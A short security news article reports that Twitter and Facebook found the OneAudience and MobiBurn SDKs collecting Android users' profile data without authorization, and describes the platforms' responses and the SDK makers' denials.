Malicious SDK could be created to scrape and share profile information, email addresses and more.
Twitter and Facebook have warned of some software development kits (SDKs) that allowed app makers to access and collect user data without authorization.
On Monday, November 25th, Twitter announced that they had received a report about an SDK made by data analytics platform OneAudience.
An SDK is a software library that app developers embed in their code to automate certain operations. Doing so, they spare themselves from writing that specific code by hand and losing precious time.
SDKs are very popular in the modern app development ecosystem. But using an SDK also implies surrendering some of your app’s control to a third-party entity.
The range of exposed data is based upon the level of access affected users had provided while connecting their social media accounts to the vulnerable apps.
“This issue is not due to a vulnerability in Twitter’s software, but rather the lack of isolation between SDKs within an application,” Twitter explained.
Collected information included email, username, and last tweet. Twitter didn’t say how many users were impacted; however, it did say that only Android users were affected.
Twitter has notified both Google and Apple about the malicious SDKs. And also suggested users to simply avoid downloading apps from third-party app stores and periodically review authorized apps.
The same issue also impacted Facebook. They spotted user data harvesting functions in two SDKs. The first was the same OneAudience SDK, while the second was an SDK from the data monetization platform MobiBurn.
The data collection behavior worked similarly to twitter.
From Facebook accounts, the two SDKs could have surreptitiously collected data such as name, email, and gender, Facebook said.
Facebook and Twitter are planning to notify people whose information was likely shared.
After the news broke yesterday, both SDK makers posted messages on their websites claiming they only provided the tools but were not involved in the data collection in any way. They also shut down the SDK along with its associated websites.
Secure Your Organization’s Mind with Securemind.se